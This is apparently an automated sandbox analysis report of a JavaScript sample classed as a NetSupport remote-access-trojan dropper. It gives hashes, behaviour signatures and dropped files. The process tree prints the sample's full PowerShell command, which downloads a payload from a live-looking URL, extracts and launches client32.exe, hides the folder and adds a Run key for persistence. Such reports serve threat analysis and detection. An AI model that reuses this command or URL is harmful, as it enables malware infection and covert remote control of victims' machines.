Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

c3d797e67e...f2e.js

windows7-x64

8

c3d797e67e...f2e.js

windows10-2004-x64

10

Analysis

  • max time kernel
    135s
  • max time network
    133s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24/10/2024, 13:15

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    c3d797e67edf0dd435808f2f79ff4bfd0cf9177307f4a112b7da09f7dfdd8f2e.js

  • Size

    5.2MB

  • MD5

    a495fbc9b99c98d0a054e937d4dcb944

  • SHA1

    b2a2433591576985adce5da344d72ae669a9cc5f

  • SHA256

    c3d797e67edf0dd435808f2f79ff4bfd0cf9177307f4a112b7da09f7dfdd8f2e

  • SHA512

    67ffdf2a2541127bcd1cf05b8f4c47e99844fb9a01ec33d5ff538e6a176eade5636f20c096e783f5d1c5b849ec2ee952a89a3fc35286d1e0e1000c0a21d39c6a

  • SSDEEP

    49152:OCz4F9dM2furCz4F9dM2fuVCz4F9dM2furCz4F9dM2fu+Cz4F9dM2furCz4F9dMW:OkGgkGMkGgkGbkGgkGMkGgkG9

Score
10/10
netsupportdiscoveryexecutionpersistencerat

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://adullamglobal.com/work/das.php?13401
exe.dropper

https://adullamglobal.com/work/das.php?13401

Signatures

  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

    ratnetsupport
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 6 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\c3d797e67edf0dd435808f2f79ff4bfd0cf9177307f4a112b7da09f7dfdd8f2e.js
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4212
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $DLNAWOOKD='https://adullamglobal.com/work/das.php?13401';$GHKAXRYCOEK=(New-Object System.Net.WebClient).DownloadString($DLNAWOOKD);$QMAPSLXX=[System.Convert]::FromBase64String($GHKAXRYCOEK);$asd = Get-Random -Minimum -5 -Maximum 12; $EENLMJVX=[System.Environment]::GetFolderPath('ApplicationData')+'\DEXHCUYIT'+$asd;if (!(Test-Path $EENLMJVX -PathType Container)) { New-Item -Path $EENLMJVX -ItemType Directory };$p=Join-Path $EENLMJVX 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$QMAPSLXX);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$EENLMJVX)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $EENLMJVX 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $EENLMJVX -Force; $fd.attributes='Hidden';$s=$EENLMJVX+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='PBHHYCWP';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:5024
      • C:\Users\Admin\AppData\Roaming\DEXHCUYIT0\client32.exe
        "C:\Users\Admin\AppData\Roaming\DEXHCUYIT0\client32.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:1540

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lr1ob443.xj4.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\DEXHCUYIT0\HTCTL32.DLL
    Filesize

    320KB

    MD5

    c94005d2dcd2a54e40510344e0bb9435

    SHA1

    55b4a1620c5d0113811242c20bd9870a1e31d542

    SHA256

    3c072532bf7674d0c5154d4d22a9d9c0173530c0d00f69911cdbc2552175d899

    SHA512

    2e6f673864a54b1dcad9532ef9b18a9c45c0844f1f53e699fade2f41e43fa5cbc9b8e45e6f37b95f84cf6935a96fba2950ee3e0e9542809fd288fefba34ddd6a

    Download Submit

  • C:\Users\Admin\AppData\Roaming\DEXHCUYIT0\MSVCR100.dll
    Filesize

    755KB

    MD5

    0e37fbfa79d349d672456923ec5fbbe3

    SHA1

    4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

    SHA256

    8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

    SHA512

    2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

    Download Submit

  • C:\Users\Admin\AppData\Roaming\DEXHCUYIT0\NSM.LIC
    Filesize

    195B

    MD5

    e9609072de9c29dc1963be208948ba44

    SHA1

    03bbe27d0d1ba651ff43363587d3d6d2e170060f

    SHA256

    dc6a52ad6d637eb407cc060e98dfeedcca1167e7f62688fb1c18580dd1d05747

    SHA512

    f0e26aa63b0c7f1b31074b9d6eef88d0cfbc467f86b12205cb539a45b0352e77ce2f99f29baeab58960a197714e72289744143ba17975699d058fe75d978dfd0

    Download Submit

  • C:\Users\Admin\AppData\Roaming\DEXHCUYIT0\PCICHEK.DLL
    Filesize

    18KB

    MD5

    104b30fef04433a2d2fd1d5f99f179fe

    SHA1

    ecb08e224a2f2772d1e53675bedc4b2c50485a41

    SHA256

    956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd

    SHA512

    5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f

    Download Submit

  • C:\Users\Admin\AppData\Roaming\DEXHCUYIT0\PCICL32.dll
    Filesize

    3.6MB

    MD5

    d3d39180e85700f72aaae25e40c125ff

    SHA1

    f3404ef6322f5c6e7862b507d05b8f4b7f1c7d15

    SHA256

    38684adb2183bf320eb308a96cdbde8d1d56740166c3e2596161f42a40fa32d5

    SHA512

    471ac150e93a182d135e5483d6b1492f08a49f5ccab420732b87210f2188be1577ceaaee4ce162a7acceff5c17cdd08dc51b1904228275f6bbde18022ec79d2f

    Download Submit

  • C:\Users\Admin\AppData\Roaming\DEXHCUYIT0\client32.exe
    Filesize

    101KB

    MD5

    c4f1b50e3111d29774f7525039ff7086

    SHA1

    57539c95cba0986ec8df0fcdea433e7c71b724c6

    SHA256

    18df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2d

    SHA512

    005db65cedaaccc85525fb3cdab090054bb0bb9cc8c37f8210ec060f490c64945a682b5dd5d00a68ac2b8c58894b6e7d938acaa1130c1cc5667e206d38b942c5

    Download Submit

  • C:\Users\Admin\AppData\Roaming\DEXHCUYIT0\client32.ini
    Filesize

    669B

    MD5

    f734588a7620c48021688d3c2940353a

    SHA1

    c9b9aece48b4c134b838217426145fdd542f60e6

    SHA256

    97a2ce9683de5c9e03331d22309b5348f45cf65e77b1f011ba3505e2deafafc6

    SHA512

    0549dcc50347802c774078f6f9ecfec2b21b0c489aa8e96168ea12a2cec55169d4172baac13819a07686755697794f05ac5b75d554229faf268f9e64f54e2033

    Download Submit

  • C:\Users\Admin\AppData\Roaming\DEXHCUYIT0\pcicapi.dll
    Filesize

    32KB

    MD5

    34dfb87e4200d852d1fb45dc48f93cfc

    SHA1

    35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641

    SHA256

    2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703

    SHA512

    f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2

    Download Submit

  • memory/5024-21-0x0000012A21110000-0x0000012A21122000-memory.dmp

    Filesize

    72KB

    Download

  • memory/5024-20-0x0000012A210E0000-0x0000012A210EA000-memory.dmp

    Filesize

    40KB

    Download

  • memory/5024-18-0x00007FFCD7C90000-0x00007FFCD8751000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/5024-6-0x00007FFCD7C93000-0x00007FFCD7C95000-memory.dmp

    Filesize

    8KB

    Download

  • memory/5024-17-0x00007FFCD7C90000-0x00007FFCD8751000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/5024-10-0x0000012A08F00000-0x0000012A08F22000-memory.dmp

    Filesize

    136KB

    Download

  • memory/5024-86-0x00007FFCD7C90000-0x00007FFCD8751000-memory.dmp

    Filesize

    10.8MB

    Download